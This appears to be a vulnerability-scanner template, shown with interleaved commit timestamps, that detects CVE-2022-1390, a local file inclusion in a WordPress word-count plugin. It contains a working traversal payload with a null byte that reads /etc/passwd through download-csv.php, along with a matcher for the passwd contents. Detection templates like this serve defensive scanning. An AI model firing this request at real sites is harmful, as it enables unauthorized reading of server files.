2022-08-06 16:54:58 +00:00
id : CVE-2022-1390
2022-03-29 12:59:12 +00:00
info :
2022-08-05 13:57:51 +00:00
name : WordPress Admin Word Count Column 2.2 - Local File Inclusion
2022-03-29 12:59:12 +00:00
author : daffainfo,Splint3r7
2022-08-25 08:56:24 +00:00
severity : critical
2022-08-10 08:40:43 +00:00
description : |
The plugin does not validate the path parameter given to readfile(), which could allow unauthenticated attackers to read arbitrary files on server running old version of PHP susceptible to the null byte technique. This could also lead to RCE by using a Phar Deserialization technique.
2022-04-02 10:39:39 +00:00
reference :
- https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html
- https://wordpress.org/plugins/admin-word-count-column/
2022-08-06 16:54:58 +00:00
- https://wpscan.com/vulnerability/6293b319-dc4f-4412-9d56-55744246c990
2022-08-10 08:40:43 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-1390
2022-08-05 13:57:51 +00:00
classification :
2022-08-25 08:56:24 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-08-06 16:54:58 +00:00
cve-id : CVE-2022-1390
2022-08-25 08:56:24 +00:00
cwe-id : CWE-22
2022-08-27 04:41:18 +00:00
tags : packetstorm,wpscan,cve,cve2022,wordpress,wp-plugin,lfi,wp
2022-03-29 12:59:12 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0'
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
- 200
2022-08-05 13:57:51 +00:00
# Enhanced by mp on 2022/08/01